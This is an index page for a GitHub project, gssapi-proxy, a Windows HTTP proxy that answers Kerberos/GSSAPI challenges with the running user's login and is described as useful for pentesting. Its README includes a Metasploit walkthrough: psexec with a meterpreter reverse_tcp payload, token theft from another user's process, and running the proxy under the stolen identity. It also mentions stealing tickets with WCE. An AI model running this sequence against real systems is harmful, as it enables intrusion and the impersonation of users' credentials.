Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mikkolehtisalo/gssapi-proxy

GSSAPI/Kerberos proxy
https://github.com/mikkolehtisalo/gssapi-proxy

Last synced: about 2 months ago
JSON representation

GSSAPI/Kerberos proxy

Host: GitHub
URL: https://github.com/mikkolehtisalo/gssapi-proxy
Owner: mikkolehtisalo
License: mit
Created: 2014-04-27T16:59:51.000Z (over 10 years ago)
Default Branch: master
Last Pushed: 2014-04-27T17:01:07.000Z (over 10 years ago)
Last Synced: 2024-04-24T10:16:41.503Z (9 months ago)
Language: Go
Size: 227 KB
Stars: 30
Watchers: 4
Forks: 15
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-network-stuff - **21**星

README

Gssapi-proxy
============

Simple http proxy for Windows. Uses running user's kerberos login to respond to kerberos/GSSAPI challenges (401/Www-Authenticate) on behalf of the client. Potentially useful for pentesting, and developers working with kerberos/GSSAPI. Implemented in Go, using SSPI. Highly extensible.

Tested on Windows 8.1 (32-bit), with Heimdal KDC and MIT's implementation of GSSAPI libraries at the other end. Should run on Windows 2000+, and might fall back to NTLM if building kerberos context fails.

Building
--------

The following command should build the application. It is a little bit large, but it should not require any dependencies from target the systems.

```
go build src\gssapi-proxy.go
```

Metasploit example
------------------

The following example exploits an other user, and runs the proxy remotely.

```
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhost x.x.x.x
set smbdomain localdomain
set smbuser user
set smbpass password
exploit
# ... elevate to Administrator / SYSTEM
upload gssapi-proxy.exe /windows/system32/gssapi-proxy.exe
# Pick process that belongs to the user that has valid kerberos tickets!
ps
steal_token PID
getuid
# Should show correct user
shell
cd /windows/system32/
gssapi-proxy.exe
# Should work, connect your browser to the proxy
# ....
# Reverse back to admin/system when you are done
rev2self
```

Notes
-----

* You must run the application as user that has valid kerberos login and tickets. Although they can later be stolen (at least WCE 1.2+ can do that) and moved to other computers, they can not initially be generated without authenticating against KDC.
* Only the most common flags are set when generating tokens. For instance delegation (ISC_REQ_DELEGATE) is not allowed for kerberos keys by default. Please see SSPI [documentation](http://msdn.microsoft.com/en-us/library/Windows/desktop/aa375509(v=vs.85).aspx) for more information if you run into problems.
* Does not reply to mutual authentication request, but it's probably somewhat rare to bump into with web applications.
* 64-bit platforms should still offer 32-bit compatible library/API so the application should compile and work. There's afaik no reason why the application should be 64-bit.
* The application does not add proxy headers, or manipulate any other headers besides Www-Authenticate/Authorization intentionally.